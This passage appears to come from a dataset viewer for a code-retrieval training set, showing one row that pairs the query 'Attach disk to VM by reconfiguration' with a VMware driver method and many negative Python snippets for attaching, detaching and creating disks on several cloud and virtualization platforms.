query
stringlengths
9
3.4k
document
stringlengths
9
87.4k
metadata
dict
negatives
sequencelengths
4
101
negative_scores
sequencelengths
4
101
document_score
stringlengths
3
10
document_rank
stringclasses
102 values
Attach disk to VM by reconfiguration.
def attach_disk_to_vm(self, vm_ref, instance_name, adapter_type, disk_type, vmdk_path=None, disk_size=None, linked_clone=False, controller_key=None, unit_number=None, device_name=None): client_factory = self._session._get_vim().client.factory vmdk_attach_config_spec = vm_util.get_vmdk_attach_config_spec( client_factory, adapter_type, disk_type, vmdk_path, disk_size, linked_clone, controller_key, unit_number, device_name) LOG.debug(_("Reconfiguring VM instance %(instance_name)s to attach " "disk %(vmdk_path)s or device %(device_name)s with type " "%(disk_type)s") % locals()) reconfig_task = self._session._call_method( self._session._get_vim(), "ReconfigVM_Task", vm_ref, spec=vmdk_attach_config_spec) self._session._wait_for_task(instance_name, reconfig_task) LOG.debug(_("Reconfigured VM instance %(instance_name)s to attach " "disk %(vmdk_path)s or device %(device_name)s with type " "%(disk_type)s") % locals())
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def AttachDisk(self, disk: 'AZComputeDisk') -> None:\n vm = self.compute_client.virtual_machines.get(\n self.resource_group_name, self.name)\n data_disks = vm.storage_profile.data_disks\n # ID to assign to the data disk to attach\n lun = 0 if len(data_disks) == 0 else len(data_disks) + 1\n\n update_data = {\n 'lun': lun,\n 'name': disk.name,\n 'create_option': models.DiskCreateOption.attach,\n 'managed_disk': {'id': disk.resource_id}\n }\n\n data_disks.append(update_data)\n\n try:\n request = self.compute_client.virtual_machines.begin_update(\n self.resource_group_name, self.name, vm)\n while not request.done():\n sleep(5) # Wait 5 seconds before checking vm status again\n except azure_exceptions.CloudError as exception:\n raise RuntimeError(\n 'Could not attach disk {0:s} to instance {1:s}: {2:s}'.format(\n disk.name, self.name, str(exception))) from exception", "def _AttachDisk(self, idx, params, _):\n uuid = params.get(\"uuid\", None)\n name = params.get(constants.IDISK_NAME, None)\n\n disk = self.GenericGetDiskInfo(uuid, name)\n\n # Rename disk before attaching (if disk is filebased)\n if disk.dev_type in constants.DTS_INSTANCE_DEPENDENT_PATH:\n # Add disk size/mode, else GenerateDiskTemplate will not work.\n params[constants.IDISK_SIZE] = disk.size\n params[constants.IDISK_MODE] = str(disk.mode)\n dummy_disk = self._GenerateDiskTemplateWrapper(idx, disk.dev_type, params)\n new_logical_id = dummy_disk.logical_id\n result = self.rpc.call_blockdev_rename(self.instance.primary_node,\n [(disk, new_logical_id)])\n result.Raise(\"Failed before attach\")\n self.cfg.SetDiskLogicalID(disk.uuid, new_logical_id)\n disk.logical_id = new_logical_id\n\n # Attach disk to instance\n self.cfg.AttachInstanceDisk(self.instance.uuid, disk.uuid, idx)\n\n # re-read the instance from the configuration\n self.instance = self.cfg.GetInstanceInfo(self.instance.uuid)\n\n changes = [\n (\"disk/%d\" % idx,\n \"attach:size=%s,mode=%s\" % (disk.size, disk.mode)),\n ]\n\n disks_ok, _, payloads = AssembleInstanceDisks(self, self.instance,\n disks=[disk])\n if not disks_ok:\n changes.append((\"disk/%d\" % idx, \"assemble:failed\"))\n return disk, changes\n\n if self.op.hotplug:\n _, link_name, uri = payloads[0]\n msg = self._HotplugDevice(constants.HOTPLUG_ACTION_ADD,\n constants.HOTPLUG_TARGET_DISK,\n disk, (link_name, uri), idx)\n changes.append((\"disk/%d\" % idx, msg))\n\n return (disk, changes)", "def attachDiskToMinipad(self , disk):\n return", "def attach_disk(self, instance, disk, zone):\n return self.call_api(\n '/zones/%s/instances/%s/attachDisk' % (zone, instance),\n method='POST',\n payload={\n 'autoDelete': True,\n 'deviceName': disk,\n 'source': 'projects/%s/zones/%s/disks/%s' % (\n self.project_id, zone, disk),\n },\n )", "def add_disk(self, vm, size, disk_type='thin'):\n logger.info(f\"Adding disk to {vm.config.name}\")\n spec = vim.vm.ConfigSpec()\n controller = self.get_controller_for_adding_disk(vm)\n unit_number = self.get_unit_number(vm)\n logger.info(f\"Unit number for new disk: {unit_number}\")\n\n device_changes = []\n new_disk_kb = int(size) * GB2KB\n disk_spec = vim.vm.device.VirtualDeviceSpec()\n disk_spec.fileOperation = \"create\"\n disk_spec.operation = vim.vm.device.VirtualDeviceSpec.Operation.add\n disk_spec.device = vim.vm.device.VirtualDisk()\n disk_spec.device.backing = vim.vm.device.VirtualDisk.FlatVer2BackingInfo()\n if disk_type == VM_DISK_TYPE:\n disk_spec.device.backing.thinProvisioned = True\n disk_spec.device.backing.diskMode = VM_DISK_MODE\n disk_spec.device.unitNumber = unit_number\n disk_spec.device.capacityInKB = new_disk_kb\n disk_spec.device.controllerKey = controller.key\n device_changes.append(disk_spec)\n spec.deviceChange = device_changes\n WaitForTask(vm.ReconfigVM_Task(spec=spec))\n logger.info(f\"{size}GB disk added successfully to {vm.config.name}\")", "def disk(self, disk):\n self._context[\"disk\"] = disk", "def disk_config(self, disk_config):\n\n self._disk_config = disk_config", "def detachDiskFromMinipad(self , disk):\n return", "def create_disk(self, disk):\n spec = {\n 'new_vmdk': {\n # Convert from mebibytes to bytes because VMDK is specified in bytes\n 'capacity': 1024\n * 1024\n * disk.size,\n }\n }\n\n try:\n backend_id = self.client.create_disk(disk.vm.backend_id, spec)\n except VMwareError as e:\n raise VMwareBackendError(e)\n else:\n disk.backend_id = backend_id\n disk.save(update_fields=['backend_id'])\n signals.vm_updated.send(self.__class__, vm=disk.vm)\n return disk", "def set_virtual_disk_storage_profile(vm, hardware_device, profile):\n\n spec = vim.vm.ConfigSpec()\n device_specs = []\n profile_specs = []\n profile_spec = vim.vm.DefinedProfileSpec()\n profile_spec.profileId = profile.profileId.uniqueId\n profile_specs.append(profile_spec)\n\n device_spec = vim.vm.device.VirtualDeviceSpec()\n device_spec.operation = vim.vm.device.VirtualDeviceSpec.Operation.edit\n device_spec.device = hardware_device\n device_spec.profile = profile_specs\n device_specs.append(device_spec)\n spec.deviceChange = device_specs\n vm.ReconfigVM_Task(spec)", "def attachDisk(\n positive, alias, vm_name, active=True, read_only=False, disk_id=None,\n interface='virtio', bootable=None,\n):\n if disk_id:\n name = disk_id\n attribute = 'id'\n else:\n name = alias\n attribute = 'name'\n disk_object = get_disk_obj(name, attribute)\n # This is only needed because for legacy reason we also want to modify\n # the read_only property when we attach a disk\n # Also for attaching a disk the active parameter is pass inside the disk\n # object\n updated_disk = _prepareDiskObject(\n id=disk_object.get_id(), read_only=read_only\n )\n vm_disks = getObjDisks(vm_name)\n logger.info(\"Attaching disk %s to vm %s\", alias, vm_name)\n disk_attachment = prepare_disk_attachment_object(\n updated_disk.get_id(), interface=interface, bootable=bootable,\n disk=updated_disk, active=active\n )\n return DISK_ATTACHMENTS_API.create(\n disk_attachment, positive, collection=vm_disks\n )[1]", "def attach_volume(self, context, connection_info, instance, mountpoint,\n disk_bus=None, device_type=None, encryption=None):", "def add_vm_with_disk(request, storage):\n self = request.node.cls\n\n def finalizer():\n assert ll_vms.safely_remove_vms(\n [self.test_vm_name]\n ), \"Unable to remove VM %s\" % self.test_vm_name\n\n request.addfinalizer(finalizer)\n self.vm_names = list()\n self.test_vm_name = storage_helpers.create_unique_object_name(\n self.__name__, config.OBJECT_TYPE_VM\n )\n vm_args = config.create_vm_args.copy()\n vm_args['vmName'] = self.test_vm_name\n vm_args['storageDomainName'] = self.storage_domain\n\n testflow.setup(\"Creating VM %s\", self.test_vm_name)\n assert storage_helpers.create_vm_or_clone(**vm_args), (\n \"Failed to create VM %s\" % self.test_vm_name\n )\n self.vm_names.append(self.test_vm_name)\n\n testflow.setup(\n \"Attaching disk %s to VM %s\", self.disk_name, self.test_vm_name\n )\n assert ll_disks.attachDisk(True, self.disk_name, self.test_vm_name), (\n \"Failed to attach disk %s to VM %s\" %\n (self.disk_name, self.test_vm_name)\n )\n assert ll_disks.wait_for_disks_status(self.disk_name), (\n \"Disk %s is not in the expected state 'OK\" % self.disk_name\n )", "def attach_volume(self, instance_name, device_path, mountpoint):\n return True", "def test_06_migrate_vm_live_attach_disk(self):\n \n global vm\n global data_disk_1\n data_disk_1 = self.helper.create_custom_disk(\n self.apiclient,\n {\"diskname\":\"StorPoolDisk\" },\n zoneid=self.zone.id,\n size = 5,\n miniops = 2000,\n maxiops = 5000,\n account=self.account.name,\n domainid=self.account.domainid,\n diskofferingid=self.disk_offerings.id,\n )\n\n self.debug(\"Created volume with ID: %s\" % data_disk_1.id)\n\n self.virtual_machine_live_migration_1.attach_volume(\n self.apiclient,\n data_disk_1\n )\n\n destinationHost, vol_list = self.helper.get_destination_pools_hosts(self.apiclient, vm, self.host)\n for v in vol_list:\n self.helper.check_storpool_volume_iops(self.spapi, v)\n vm = self.helper.migrateVm(self.apiclient, self.virtual_machine_live_migration_1, destinationHost)\n\n\n self.virtual_machine_live_migration_1.attach_volume(\n self.apiclient,\n self.volume\n )\n\n destinationHost, vol_list = self.helper.get_destination_pools_hosts(self.apiclient,vm, self.host)\n for v in vol_list:\n self.helper.check_storpool_volume_iops(self.spapi, v)\n vm = self.helper.migrateVm(self.apiclient, self.virtual_machine_live_migration_1, destinationHost)\n\n destinationHost, vol_list = self.helper.get_destination_pools_hosts(self.apiclient,vm, self.host)\n for v in vol_list:\n self.helper.check_storpool_volume_iops(self.spapi, v)", "def attach(self, storages):\n self.tracer.info(\"%s.attach method called\" % self.__class__.__name__)\n\n # reload global.ini\n self._cfg.reload()\n\n # connect to Google API\n conn = self.api_conn()\n\n # fetch the GCE zone for this host\n zone = self.get_zone(conn, HOSTNAME)\n\n for storage in storages:\n # fetch pd & dev variables from global.ini for specified partition & usage\n connectionData = self._getConnectionDataForLun(storage.get(\"partition\"), storage.get(\"usage_type\"))\n try:\n pd = connectionData[\"pd\"]\n dev = connectionData[\"dev\"]\n except:\n raise Exception(\"pd or dev not set in global.ini\")\n\n # fetch mount options from global.ini\n try:\n mount_options = connectionData[\"mountoptions\"]\n except:\n mount_options = \"\"\n\n # fetch fencing options from global.ini\n try:\n fencing = connectionData[\"fencing\"]\n except:\n fencing = \"\"\n\n # fetch the host which currently owns the disk & the file path\n pdhost = self.get_pd_host(conn, pd, zone)\n path = storage.get(\"path\")\n\n # check if the require disk is already attached somewhere. If it is, detach it and fence the old host\n if pdhost == HOSTNAME:\n self.tracer.info(\"disk %s is already attached to %s(%s)\" % (pd, HOSTNAME, zone))\n self.mount(dev, path, mount_options)\n continue\n elif pdhost != \"\":\n self.tracer.info(\"unable to attach %s to %s(%s) as it is still attached to %s\" % (pd, HOSTNAME, zone, pdhost))\n self.detach_pd(conn, pdhost, pd)\n if fencing.lower() == \"enabled\" or fencing.lower() == \"true\" or fencing.lower() == \"yes\":\n self.fence(conn, pdhost)\n\n # prepare payload for API call\n pdurl = self.zonal_url(zone, \"disks\", pd)\n body = {\n \"deviceName\": pd,\n \"source\": pdurl\n }\n\n # send API call to disconnect disks\n self.tracer.info(\"attempting to attach %s to %s(%s)\" % (pd, HOSTNAME, zone))\n operation = conn.instances().attachDisk(project=PROJECT, zone=zone, instance=HOSTNAME, body=body).execute()\n self.wait_for_operation(conn, operation, zone)\n\n # check if disk is attached and if so, mount the volumes\n if self.get_pd_host(conn, pd, zone) == HOSTNAME:\n self.tracer.info(\"successfully attached %s to %s(%s)\" % (pd, HOSTNAME, zone))\n self.mount(dev, path, mount_options)\n else:\n raise Exception(\"failed to attached %s to %s(%s)\" % (pd, HOSTNAME, zone))\n\n # tell HANA is all good and to continue the load process\n return 0", "def do_install_disk(cls, disk, disk_name, creator, workdir, oe_builddir,\n bootimg_dir, kernel_dir, native_sysroot):\n logger.debug(\"SourcePlugin: do_install_disk: disk: %s\", disk_name)", "def disk_detach(vmdk_path, vm):\n\n device = findDeviceByPath(vmdk_path, vm)\n\n if not device:\n # Could happen if the disk attached to a different VM - attach fails\n # and docker will insist to sending \"unmount/detach\" which also fails.\n msg = \"*** Detach failed: disk={0} not found. VM={1}\".format(\n vmdk_path, vm.config.uuid)\n logging.warning(msg)\n return err(msg)\n\n spec = vim.vm.ConfigSpec()\n dev_changes = []\n\n disk_spec = vim.vm.device.VirtualDeviceSpec()\n disk_spec.operation = vim.vm.device.VirtualDeviceSpec.Operation.remove\n disk_spec.device = device\n dev_changes.append(disk_spec)\n spec.deviceChange = dev_changes\n\n try:\n wait_for_tasks(si, [vm.ReconfigVM_Task(spec=spec)])\n except vim.fault.GenericVmConfigFault as ex:\n for f in ex.faultMessage:\n logging.warning(f.message)\n return err(\"Failed to detach \" + vmdk_path)\n\n setStatusDetached(vmdk_path)\n logging.info(\"Disk detached %s\", vmdk_path)\n return None", "def detach_disk_from_vm(self, vm_ref, instance_name, device):\n client_factory = self._session._get_vim().client.factory\n vmdk_detach_config_spec = vm_util.get_vmdk_detach_config_spec(\n client_factory, device)\n disk_key = device.key\n LOG.debug(_(\"Reconfiguring VM instance %(instance_name)s to detach \"\n \"disk %(disk_key)s\") % locals())\n reconfig_task = self._session._call_method(\n self._session._get_vim(),\n \"ReconfigVM_Task\", vm_ref,\n spec=vmdk_detach_config_spec)\n self._session._wait_for_task(instance_name, reconfig_task)\n LOG.debug(_(\"Reconfigured VM instance %(instance_name)s to detach \"\n \"disk %(disk_key)s\") % locals())", "def setDisk(self, disk):\n self.__disk = disk", "def attach(self, node, device=None):\r\n\r\n return self.driver.attach_volume(node=node, volume=self, device=device)", "def _flash_dev(disk: pathlib.Path, image_path: pathlib.Path) -> None:\n shutil.copy(image_path, disk, follow_symlinks=False)\n if not platform.system() == \"Windows\":\n os.sync()", "def connect_disk(self, instance, disk_info, stg_ftsk=None):\n raise NotImplementedError()", "def attach_volume(self, context, connection_info, instance, mountpoint,\n disk_bus=None, device_type=None, encryption=None):\n data = connection_info['data']\n vm = self._get_instance(instance.uuid)\n data_disks = vm.storage_profile.data_disks\n luns = [i.lun for i in data_disks]\n new_lun = 1\n # azure allow upto 16 extra datadisk, 1 os disk + 1 ephemeral disk\n # ephemeral disk will always be sdb for linux.\n for i in range(1, 16):\n if i not in luns:\n new_lun = i\n break\n else:\n msg = 'Can not attach volume, exist volume amount upto 16.'\n LOG.error(msg)\n raise nova_ex.NovaException(msg)\n disk = self.disks.get(CONF.azure.resource_group, data['disk_name'])\n managed_disk = dict(id=disk.id)\n data_disk = dict(lun=new_lun,\n name=data['disk_name'],\n managed_disk=managed_disk,\n create_option='attach')\n data_disks.append(data_disk)\n self._create_update_instance(instance, vm)\n LOG.info(_LI(\"Attach Volume to Instance in Azure finish\"),\n instance=instance)", "def attach_volume(self, host_path: str, container_path: str, mode: str = None):\n self.volumes[host_path] = {\n \"bind\": container_path,\n \"mode\": mode or \"Z\"\n }", "def reconfigure_nova_ephemeral_disk(self):\n self.check_run('reconfigure_nova_ephemeral_disk')\n self.show_step(1, initialize=True)\n self.env.revert_snapshot(\"reconfigure_overcommit_ratio\")\n\n cluster_id = self.fuel_web.get_last_created_cluster()\n computes = self.fuel_web.get_nailgun_cluster_nodes_by_roles(\n cluster_id, ['compute'])\n\n self.show_step(2)\n existing_configs = self.fuel_web.client.list_configuration(\n cluster_id)\n for existing_config in existing_configs:\n self.fuel_web.client.delete_configuration(existing_config[\"id\"])\n\n self.show_step(3)\n config = utils.get_config_template('nova_disk')\n structured_config = get_structured_config_dict(config)\n self.fuel_web.client.upload_configuration(config,\n cluster_id,\n role='compute')\n\n service_name = \"nova-compute\"\n\n uptimes = self.get_service_uptime(computes, service_name)\n\n self.show_step(4)\n task = self.fuel_web.client.apply_configuration(cluster_id,\n role='compute')\n self.show_step(5)\n self.fuel_web.assert_task_success(task, timeout=900, interval=5)\n\n self.show_step(6)\n self.check_service_was_restarted(computes, uptimes, service_name)\n\n self.show_step(7)\n self.check_config_on_remote(computes, structured_config)\n\n os_conn = os_actions.OpenStackActions(\n self.fuel_web.get_public_vip(cluster_id))\n\n self.show_step(8)\n self.show_step(9)\n self.show_step(10)\n self.show_step(11)\n self.show_step(12)\n self.check_nova_ephemeral_disk(os_conn, cluster_id)\n\n self.env.make_snapshot(\"reconfigure_nova_ephemeral_disk\",\n is_make=True)", "def _setDisk(self, disk):\n log_method_call(self, self.name, old=getattr(self.disk, \"name\", None),\n new=getattr(disk, \"name\", None))\n self.parents = []\n if disk:\n self.parents.append(disk)", "def do_install_disk(cls, disk, disk_name, creator, workdir, oe_builddir,\n bootimg_dir, kernel_dir, native_sysroot):\n if not cls.__imgBiosObj:\n cls.__instanciateBIOSClass()\n\n cls.__imgBiosObj.do_install_disk(disk, disk_name, creator, workdir,\n oe_builddir, bootimg_dir, kernel_dir,\n native_sysroot)", "def attach_volume(self, connection_info, instance, mountpoint):\n instance_name = instance['name']\n vm_ref = vm_util.get_vm_ref_from_name(self._session, instance_name)\n if vm_ref is None:\n raise exception.InstanceNotFound(instance_id=instance_name)\n # Attach Volume to VM\n LOG.debug(_(\"Attach_volume: %(connection_info)s, %(instance_name)s, \"\n \"%(mountpoint)s\") % locals())\n driver_type = connection_info['driver_volume_type']\n if driver_type not in ['iscsi']:\n raise exception.VolumeDriverNotFound(driver_type=driver_type)\n data = connection_info['data']\n mount_unit = volume_util.mountpoint_to_number(mountpoint)\n\n # Discover iSCSI Target\n device_name, uuid = self.discover_st(data)\n if device_name is None:\n raise volume_util.StorageError(_(\"Unable to find iSCSI Target\"))\n\n # Get the vmdk file name that the VM is pointing to\n hardware_devices = self._session._call_method(vim_util,\n \"get_dynamic_property\", vm_ref,\n \"VirtualMachine\", \"config.hardware.device\")\n vmdk_file_path, controller_key, adapter_type, disk_type, unit_number \\\n = vm_util.get_vmdk_path_and_adapter_type(hardware_devices)\n # Figure out the correct unit number\n if unit_number < mount_unit:\n unit_number = mount_unit\n else:\n unit_number = unit_number + 1\n self.attach_disk_to_vm(vm_ref, instance_name,\n adapter_type, disk_type=\"rdmp\",\n controller_key=controller_key,\n unit_number=unit_number,\n device_name=device_name)\n LOG.info(_(\"Mountpoint %(mountpoint)s attached to \"\n \"instance %(instance_name)s\") % locals())", "def createVM(self ,disk ,name):\n return", "def update_volume_after_attached_to_vm(self, info, vms):\n path = info[0]['path']\n path_list = path.split(sep='/')\n machine_path_list = [\"~\", \"Home\"]\n machine_path_list.extend(path_list[3:])\n info[0]['machine_path'] = \"/\".join(machine_path_list)\n info[0]['AttachedToVm'] = vms\n info[0]['State'] = 'in-use'\n info[0]['time'] = datetime.datetime.now()\n return info", "def attach_volume(self):\n\n # Choose volume\n volume_id = self._choose_among_available_volumes()\n\n # Cancel\n if not volume_id:\n print 'Operation cancelled'\n return\n\n # Choose instance\n instance_id = self._choose_among_running_instances()\n\n # Cancel\n if not instance_id:\n print 'Operation cancelled'\n return\n\n # Attach the volume\n print '# Attaching volume \"%s\"!' % volume_id\n if self.compute.attach_volume(volume_id, instance_id):\n print 'The volume has been attached!'\n else:\n print 'The volume could not been attached'", "def add_disk_for_rhv_platform():\n platform = config.ENV_DATA.get(\"platform\").lower()\n if platform == constants.RHV_PLATFORM:\n # Importing here to avoid circular dependency\n from ocs_ci.deployment.rhv import RHVBASE\n\n rhv_base = RHVBASE()\n rhv_base.attach_disks(\n config.ENV_DATA.get(\"device_size\", defaults.DEVICE_SIZE),\n config.ENV_DATA.get(\"disk_format\", constants.RHV_DISK_FORMAT_RAW),\n config.ENV_DATA.get(\n \"disk_interface\", constants.RHV_DISK_INTERFACE_VIRTIO_SCSI\n ),\n config.ENV_DATA.get(\"sparse\"),\n config.ENV_DATA.get(\"pass_discard\"),\n )", "def disk_set(vm_hostname, size):\n with ExitStack() as es:\n vm = es.enter_context(_get_vm(vm_hostname))\n\n current_size_gib = vm.dataset_obj['disk_size_gib']\n if size.startswith('+'):\n new_size_gib = current_size_gib + parse_size(size[1:], 'g')\n elif size.startswith('-'):\n new_size_gib = current_size_gib - parse_size(size[1:], 'g')\n else:\n new_size_gib = parse_size(size, 'g')\n\n if new_size_gib == vm.dataset_obj['disk_size_gib']:\n raise Warning('Disk size is the same.')\n\n if vm.dataset_obj['datacenter_type'] == 'aws.dct':\n vm.aws_disk_set(new_size_gib)\n elif vm.dataset_obj['datacenter_type'] == 'kvm.dct':\n _check_defined(vm)\n\n vm.hypervisor.vm_set_disk_size_gib(vm, new_size_gib)\n\n else:\n raise NotImplementedError(\n 'This operation is not yet supported for {}'.format(\n vm.dataset_obj['datacenter_type'])\n )\n\n vm.dataset_obj['disk_size_gib'] = new_size_gib\n vm.dataset_obj.commit()", "def add_disk(self, disk_type, device_type, disk, qemu_type=\"raw\"):\n\t\txml_type = \"%s_%s\" % (disk_type, device_type)\n\t\tif device_type in self.disk_ids:\n\t\t\tself.disk_ids[device_type] += 1\n\t\telse:\n\t\t\tself.disk_ids[device_type] = ord('a')\n\n\t\tf = os.path.join(self.config_dir, \"%s-%s-%s\" % (\n\t\t\tdisk_type, device_type, LibvirtFile.TEMPLATE_FILE))\n\t\tif not os.path.exists(f):\n\t\t\tcziso.abort(\"Unable to find libvirt file %s\" % f)\n\n\t\tvalues = {\n\t\t\t'id': chr(self.disk_ids[device_type]),\n\t\t\txml_type: os.path.realpath(disk),\n\t\t\t'qemu_type': qemu_type\n\t\t}\n\t\tself.disk_xmls.append(cziso.fill_template(f, **values))", "def test_11_migrate_vm_live_attach_disk_on_remote(self):\n \n global vm2\n global data_disk_2\n data_disk_2 = self.helper.create_custom_disk(\n self.apiclient,\n {\"diskname\":\"StorPoolDisk\" },\n zoneid=self.zone.id,\n size = 5,\n miniops = 2000,\n maxiops = 5000,\n account=self.account.name,\n domainid=self.account.domainid,\n diskofferingid=self.disk_offerings.id,\n )\n\n self.debug(\"Created volume with ID: %s\" % data_disk_2.id)\n\n self.virtual_machine_live_migration_2.attach_volume(\n self.apiclient,\n data_disk_2\n )\n\n destinationHost, vol_list = self.helper.get_destination_pools_hosts(self.apiclient, vm2, self.host_remote)\n for v in vol_list:\n self.helper.check_storpool_volume_iops(self.spapi, v)\n vm2 = self.helper.migrateVm(self.apiclient, self.virtual_machine_live_migration_2, destinationHost)\n\n\n self.virtual_machine_live_migration_2.attach_volume(\n self.apiclient,\n self.volume_2\n )\n\n destinationHost, vol_list = self.helper.get_destination_pools_hosts(self.apiclient, vm2, self.host_remote)\n for v in vol_list:\n self.helper.check_storpool_volume_iops(self.spapi, v)\n vm2 = self.helper.migrateVm(self.apiclient, self.virtual_machine_live_migration_2, destinationHost)", "def create(self, spec, force_cache):\n\n instance_id = self.get_instance_id(spec)\n instance_dir = os.path.join(self.directory, instance_id)\n # create the directory to hold all the bits\n logger.info(\"Creating directory %s\" % (instance_dir, ))\n os.mkdir(instance_dir)\n\n logger.info(\"Creating virtual machine\")\n self.vboxmanage(\"createvm\", name=instance_id, directory=self.directory, ostype=self.ostype[spec.image.distro])\n self.vboxmanage(\"configurevm\", name=instance_id, memsize=spec.hardware.memory)\n network = self.guess_network()\n network.configurevm(instance_id)\n\n logger.info(\"Creating disk image from %s\" % (spec.image, ))\n # create the disk image and attach it\n disk = os.path.join(instance_dir, instance_id + \"_disk1.vdi\")\n self.qemu_img(\"convert\", source=spec.image.fetch(self.image_dir, force_cache), destination=disk, format=\"vdi\")\n self.vboxmanage(\"create_sata\", name=instance_id)\n self.vboxmanage(\"attach_disk\", name=instance_id, disk=disk)\n\n # create the seed ISO\n logger.info(\"Creating cloudinit seed\")\n config_class = self.configs[spec.image.distro]\n cloud_config = config_class(spec)\n meta_data = MetaData(spec.name)\n seed = Seed(instance_dir, cloud_config=cloud_config, meta_data=meta_data)\n seed.write()\n\n logger.info(\"Attaching devices\")\n # connect the seed ISO and the tools ISO\n self.vboxmanage(\"create_ide\", name=instance_id)\n self.vboxmanage(\"attach_ide\", name=instance_id, port=\"0\", device=\"0\", filename=seed.pathname)\n self.vboxmanage(\"attach_ide\", name=instance_id, port=\"0\", device=\"1\", filename=\"/usr/share/virtualbox/VBoxGuestAdditions.iso\")\n logger.info(\"Machine created\")\n\n logger.info(\"Mounting host drive\")\n hostpath = os.path.expanduser(\"~\")\n self.vboxmanage(\"mount\", name=instance_id, hostpath=hostpath)\n return self.load(instance_id)", "def loopattach(diskimg):\n result = subprocess.run(['losetup', '--find', diskimg], check=True)\n return loopdev(diskimg)", "def attach_volume(\n self,\n volume: Union[dto.Volume, str],\n machine: Union[dto.Machine, str]\n ) -> dto.Volume:\n raise errors.UnsupportedOperationError(\n \"Operation not supported for provider '{}'\".format(self.provider_name)\n )", "def vm_diskadd(args):\n name = args.name\n size = args.size\n template = args.template\n pool = args.pool\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone, namespace=args.namespace)\n k = config.k\n if size is None:\n common.pprint(\"Missing size. Leaving...\", color='red')\n os._exit(1)\n if pool is None:\n common.pprint(\"Missing pool. Leaving...\", color='red')\n os._exit(1)\n if name is None:\n common.pprint(\"Missing name. Leaving...\", color='red')\n os._exit(1)\n common.pprint(\"Adding disk to %s...\" % name)\n k.add_disk(name=name, size=size, pool=pool, template=template)", "def import_disk(\n self,\n backend_vm_id,\n backend_disk_id,\n save=True,\n project=None,\n ):\n try:\n backend_disk = self.client.get_disk(backend_vm_id, backend_disk_id)\n except VMwareError as e:\n raise VMwareBackendError(e)\n\n disk = self._backend_disk_to_disk(backend_disk, backend_disk_id)\n disk.service_settings = self.settings\n disk.project = project\n if save:\n disk.save()\n\n return disk", "def mount_root_vm(self):\n print \"montage de la partition root de %s\" % name_vm_dest\n self.exec_cmd(\"mount /dev/%s/root-%s %s\" % (vgname, name_vm_dest, self.rep_vhosts_vm))", "def create(self, disk):\n logging.info('Adding type %d partition to disk image: %s' % (self.type, disk.filename))\n run_cmd('parted', '--script', '--', disk.filename, 'mkpart', 'primary', self.parted_fstype(), self.begin, self.end)", "def attach(self, instance_id, device):\r\n return self.connection.attach_volume(self.id, instance_id, device)", "def prepare_disks_for_vm(\n vm_name, disks_to_prepare, read_only=False, interfaces=list()\n):\n is_ro = 'Read Only' if read_only else 'Read Write'\n if not interfaces:\n interfaces = [config.VIRTIO] * len(disks_to_prepare)\n\n def attach_and_activate(disk, interface):\n logger.info(\n \"Attaching disk %s as %s disk to vm %s\", disk, is_ro, vm_name\n )\n assert ll_disks.attachDisk(\n positive=True, alias=disk, vm_name=vm_name, active=True,\n read_only=read_only, interface=interface\n ), \"Failed to attach disk %s to vm %s\" % (disk, vm_name)\n\n with ThreadPoolExecutor(max_workers=len(disks_to_prepare)) as executor:\n for disk, interface in zip(disks_to_prepare, interfaces):\n executor.submit(attach_and_activate, disk, interface)\n return True", "def _load_disk(self):\r\n pass", "def update_volume_after_detach(self, info, vms):\n info[0]['AttachedToVm'] = vms\n if len(vms) == 0:\n info[0]['machine_path'] = None\n info[0]['State'] = 'available'\n info[0]['time'] = datetime.datetime.now()\n return info", "def _do_attach(self, attach_device):\n try:\n if attach_device is not None:\n log.debug(\"Attaching volume '%s' to instance '%s' as device '%s'\" %\n (self.volume_id, self.app.cloud_interface.get_instance_id(),\n attach_device))\n self.volume.attach(\n self.app.cloud_interface.get_instance_id(), attach_device)\n else:\n log.error(\"Attaching volume '%s' to instance '%s' failed because \"\n \"could not determine device.\"\n % (self.volume_id, self.app.cloud_interface.get_instance_id()))\n return False\n except EC2ResponseError, e:\n if e.error_code == 'InvalidVolume.ZoneMismatch':\n msg = (\"Volume '{0}' is located in the wrong availability zone \"\n \"for this instance. You MUST terminate this instance \"\n \"and start a new one in zone '{1}' instead of '{2}' \"\n \"to be able to use this volume.\"\n .format(self.volume_id, self.volume.zone,\n self.app.cloud_interface.get_zone()))\n self.app.msgs.critical(msg)\n log.error(msg)\n self.fs.state = service_states.ERROR\n else:\n log.error(\"Attaching volume '%s' to instance '%s' as device '%s' failed. \"\n \"Exception: %s (%s)\" % (self.volume_id,\n self.app.cloud_interface.get_instance_id(),\n attach_device, e.message,\n e.error_code))\n return False\n return self.status", "def create(self, directory):\n\n if not self.preallocated:\n if directory:\n self.filename = '%s/%s' % (directory, self.filename)\n logging.info('Creating disk image: %s' % self.filename)\n qemu_img_output = run_cmd(qemu_img_path(), 'create', '-f', 'raw', self.filename, '%dM' % self.size)\n if not os.path.exists(self.filename): \n logging.info(\"Problem while creating raw image: %s\" % qemu_img_output)\n raise Exception(\"Problem while creating raw image: %s\" % qemu_img_output)\n\n # From here, we assume that self.filename refers to whatever holds the disk image,\n # be it a file, a partition, logical volume, actual disk..\n\n logging.info('Adding partition table to disk image: %s' % self.filename)\n run_cmd('parted', '--script', self.filename, 'mklabel', 'msdos')\n\n # Partition the disk \n for part in self.partitions:\n part.create(self)\n\n logging.info('Creating loop devices corresponding to the created partitions')\n self.vm.add_clean_cb(lambda : self.unmap(ignore_fail=True))\n kpartx_output = run_cmd('kpartx', '-av', self.filename)\n parts = []\n for line in kpartx_output.split('\\n'):\n if line == \"\" or line.startswith(\"gpt:\") or line.startswith(\"dos:\"):\n continue\n if line.startswith(\"add\"):\n parts.append(line)\n continue\n logging.error('Skipping unknown line in kpartx output (%s)' % line)\n mapdevs = []\n for line in parts:\n mapdevs.append(line.split(' ')[2])\n for (part, mapdev) in zip(self.partitions, mapdevs):\n part.mapdev = '/dev/mapper/%s' % mapdev\n\n # At this point, all partitions are created and their mapping device has been\n # created and set as .mapdev\n\n # Adds a filesystem to the partition\n logging.info(\"Creating file systems\")\n for part in self.partitions:\n part.mkfs()", "def _load_disk(self):", "def _load_disk(self):", "def attach_device(self, device_data):\n self.attached_device = device_data", "def add_disk_for_vsphere_platform():\n platform = config.ENV_DATA.get(\"platform\").lower()\n lso_type = config.DEPLOYMENT.get(\"type\")\n if platform == constants.VSPHERE_PLATFORM:\n # Types of LSO Deployment\n # Importing here to avoid circular dependency\n from ocs_ci.deployment.vmware import VSPHEREBASE\n\n vsphere_base = VSPHEREBASE()\n\n if lso_type == 